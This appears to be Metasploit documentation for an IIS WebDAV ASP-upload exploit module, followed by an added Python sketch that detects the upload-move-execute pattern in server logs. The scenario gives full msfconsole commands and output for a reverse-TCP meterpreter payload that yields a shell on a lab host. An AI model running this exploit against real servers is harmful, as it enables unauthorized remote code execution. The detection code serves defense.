Vulnerable Application

This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.

IMPORTANT: The target IIS machine must meet all of these conditions to be considered exploitable:

  1. It allows 'Script resource access'.
  2. It allows Read and Write permission.
  3. It supports ASP.

WebDAV

Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.

Verification Steps

  1. Do: use exploit/windows/iis/iis_webdav_upload_asp
  2. Do: set payload windows/meterpreter/reverse_tcp
  3. Do: set LHOST [IP]
  4. Do: set RHOST [IP]
  5. Do: set PATH / [PATH]
  6. Do: run

Scenarios

msf > use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(iis_webdav_upload_asp) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(iis_webdav_upload_asp) > set RHOST 172.16.176.54
RHOST => 172.16.176.54
msf exploit(iis_webdav_upload_asp) > set LHOST 172.16.176.56
LHOST => 172.16.176.56
msf exploit(iis_webdav_upload_asp) > set path /upload/test.asp
path => /upload/test.asp
msf exploit(iis_webdav_upload_asp) > exploit

[*] Started reverse handler on 172.16.176.56:4444
[*] Uploading 613830 bytes to /upload/test.txt...
[*] Moving /upload/test.txt to /upload/test.asp...
[*] Executing /upload/test.asp...
[*] Sending stage (770048 bytes) to 172.16.176.54
[*] Deleting /upload/test.asp, this doesn't always work...
[!] Deletion failed on /upload/test.asp [403 Forbidden]

meterpreter > getuid
Server username: JUAN-C0DE875735\IWAM_JUAN-C0DE875735
meterpreter >
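
The scenario above leaves a recognizable request sequence on the server: a PUT of a non-script file, a MOVE of that file, then a request for a script with the same base name. The following detection sketch is an added example, not part of the Metasploit module or its documentation. The log lines are constructed, and the `#Fields` layout and the script extension list are assumptions; it also assumes the log does not record the MOVE destination, so it correlates on client IP and base name.

```python
import posixpath

# Constructed W3C-style log (not from the page); the #Fields layout is assumed.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-01 10:00:01 GET /index.asp 10.0.0.5 200
2024-01-01 10:00:02 PUT /upload/test.txt 10.0.0.9 201
2024-01-01 10:00:03 MOVE /upload/test.txt 10.0.0.9 201
2024-01-01 10:00:04 GET /upload/test.asp 10.0.0.9 200
2024-01-01 10:00:05 DELETE /upload/test.asp 10.0.0.9 403
2024-01-01 10:01:00 PUT /docs/report.txt 10.0.0.7 201
2024-01-01 10:01:30 GET /docs/report.txt 10.0.0.7 200
"""

# Assumed list of extensions the server hands to a script engine.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".aspx"}

def parse(log_text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def find_upload_move_execute(log_text):
    """Flag PUT (non-script) -> MOVE -> request for a script with the same base name."""
    stage = {}   # (client ip, path without extension) -> "put" or "moved"
    alerts = []
    for rec in parse(log_text):
        method = rec["cs-method"].upper()
        base, ext = posixpath.splitext(rec["cs-uri-stem"].lower())
        key = (rec["c-ip"], base)
        ok = rec["sc-status"].startswith("2")
        if method == "PUT" and ok and ext not in SCRIPT_EXTS:
            stage[key] = "put"
        elif method == "MOVE" and ok and stage.get(key) == "put":
            stage[key] = "moved"
        elif method in ("GET", "POST") and ext in SCRIPT_EXTS and stage.get(key) == "moved":
            alerts.append({"client": rec["c-ip"], "script": rec["cs-uri-stem"],
                           "time": rec["date"] + " " + rec["time"]})
            del stage[key]
    return alerts

if __name__ == "__main__":
    print(find_upload_move_execute(SAMPLE_LOG))
```

The ordinary upload from 10.0.0.7 is not flagged because no MOVE and no script request follow it.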